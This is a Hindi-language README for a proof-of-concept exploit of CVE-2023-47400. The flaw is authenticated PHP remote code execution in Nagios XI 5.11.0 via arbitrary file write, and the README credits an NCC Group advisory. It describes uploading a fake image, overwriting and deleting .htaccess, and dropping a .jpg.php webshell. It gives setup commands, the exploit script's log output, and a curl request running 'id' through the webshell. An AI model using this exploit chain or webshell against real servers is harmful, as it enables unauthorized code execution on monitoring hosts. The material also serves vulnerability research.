
CVE-2023-47400 के लिए प्रूफ ऑफ कॉन्सेप्ट
CVE-2023-47400 के लिए प्रमाण अवधारणा
प्रमाणीकृत PHP रिमोट कोड निष्पादन Nagios XI 5.11.0 पर मनमानी फ़ाइल लेखन के माध्यम से
[!Note] यह poc NCC समूह द्वारा प्रकाशित तकनीकी सलाह पर आधारित है https://research.nccgroup.com/2023/12/13/technical-advisory-multiple-vulnerabilities-in-nagios-xi/
यह poc इस प्रक्रिया का अनुसरण करता है :
placeholder.jpg नामक एक मान्य छवि अपलोड करें (केवल JFIF मैजिक बाइट्स हेडर, कोई सामग्री नहीं)rename सुविधा का उपयोग करके छवि का नाम .htaccess में बदलें (जिसका प्रभाव मौजूदा .htaccess फ़ाइल को अधिलेखित करना है)delete सुविधा का उपयोग करके .htaccess फ़ाइल को हटाएँ.jpg.php डबल एक्सटेंशन के माध्यम से छवि हस्ताक्षर को धोखा देना)इस भेद्यता का शोषण nagiosXI होस्ट पर रिमोट कोड निष्पादन की ओर ले जाता है, फ़ाइल अपलोड फ़िल्टर (फ़ाइल हस्ताक्षर और फ़ाइल एक्सटेंशन फ़िल्टर के माध्यम से) और PHP निष्पादन रोकथाम (.htaccess के माध्यम से) को बायपास करता है।
[!Warning] यह एक्सप्लॉइट होस्ट पर मौजूद
<NAGIOS_WEB_ROOT>/includes/components/custom-includes/images/.htaccessफ़ाइल को हटा देता है ताकि PHP कोड निष्पादन की अनुमति मिल सके!
# create a venv to dependency isolation
python3 -m venv .venv
source .venv/bin/activate
# run pip install before running the exploit
pip install -r requirements.txt
छवि अपलोड फ़ोल्डर में डालने के लिए PHP पेलोड को अनुकूलित करें
एक्सप्लॉइट स्क्रिप्ट चलाएँ :
python exploit.py
# the exploit generates a webshell and upload it with uuid as filename
[...]
INFO:cve_2023_47400:Successfuly uploaded payload at
INFO:cve_2023_47400:Usage :https://10.10.11.248/nagiosxi/includes/components/custom-includes/images/6ac234ca-8921-4e7e-a833-bf1ba03d2a3c.jpg.php
INFO:cve_2023_47400:Exploit completed successfuly
$ curl -k 'https://10.10.11.248/nagiosxi/includes/components/custom-includes/images/6ac234ca-8921-4e7e-a833-bf1ba03d2a3c.jpg.php?cmd=id' --output -
JFIF
uid=33(www-data) gid=33(www-data) groups=33(www-data),121(Debian-snmp),1001(nagios),1002(nagcmd)